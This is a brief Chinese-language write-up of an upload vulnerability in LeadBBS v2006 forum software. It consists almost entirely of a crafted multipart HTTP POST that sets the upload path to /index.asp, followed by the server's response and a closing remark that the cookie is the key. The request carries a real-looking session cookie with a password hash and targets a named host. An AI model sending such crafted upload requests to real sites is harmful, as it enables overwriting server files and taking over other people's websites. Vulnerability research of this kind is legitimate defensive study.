LeadBBS v2006 上传漏洞研究

POST /User/uploadFile.asp?submitflag=yes HTTP/1.1
Content-Type: multipart/form-data; boundary=@#$gxgl
Referer: http://webidc.vicp.net/User/uploadFile.asp?submitflag=yes
Host: webidc.vicp.net
Content-Length: 345
Cookie: ASPSESSIONIDQQCDQQAQ=OFNPJGMBGGBDEEOJMLGJEMMC; x86AtBD=0; x86Time=2006%2D3%2D18+18%3A50%3A23; cnzz02=0; rtime=0; ltime=1142679153378; cnzz_eid=56351174-; x86=pass=e10adc3949ba59abbe56e057f20f883e&user=%C2%B7%B9%FD

@#$--gxgl
Content-Disposition: form-data; name="filepath"

/index.asp


HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 18 Mar 2006 11:23:38 GMT
X-Powered-By: ASP.NET
Content-Length: 1484
Content-Type: text/html
Set-Cookie: x86Time=2006%2D3%2D18+19%3A23%3A39; path=/
Cache-control: private


<script language=javascript>
<!--

   function addcontent(tmpstr,GBL_Width,GBL_Height)
   {
       parent.document.LeadBBSFm.Form_FaceUrl.value = tmpstr;
       parent.document.LeadBBSFm.Form_FaceWidth.value = GBL_Width;
       parent.document.LeadBBSFm.Form_FaceHeight.value = GBL_Height;
       parent.document.faceimg.src=tmpstr;
       parent.document.faceimg.width=GBL_Width;
       parent.document.faceimg.height=GBL_Height;
   }

//-->
</script>

<html>
<head>
   
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=gb2312">
   <meta http-equiv="Content-Language" content="zh-cn">
   <META name="description" content="LeadBBS论坛,ASP论坛,计数器,统计系统,dotNet,asp.Net,源代码下载,组件,免费代码,ASP,数据库,SQL,文章,入门,ASP精品屋">
   <title>
         
   </title>
   <link rel="stylesheet" type="text/css" href="../inc/style7.css">
   <style>
   <!--
       .l {FONT-FAMILY: 宋体; FONT-SIZE: 12px;}
       table {WORD-BREAK: break-all;}
   -->
   </style>
</head>

   <script language=javascript>
       function ctlent()
       {
           if(window.event.keyCode==27)
           {window.close();}
       }
   </script>
   <body onkeydown="ctlent();" class=TBBG9>
   
<body bgcolor=#f7f7f7 leftmargin="0" topmargin="0">

   <script language=javascript>
   <!--
   alert("非图像文件,上传错误!");

   //-->
   </script>
   <img src=../images/null.gif width=2 height=5><br> 文件上传成功,要<a href=uploadFile.asp>继续上传请点这里</a>
   <img sc=../images/blank.gif height=6 width=1><br><a href=uploadFile.asp></a>
</body>
</html>


http://XXXX/User/uploadFile.asp?submitflag=yes

Cookie

是关键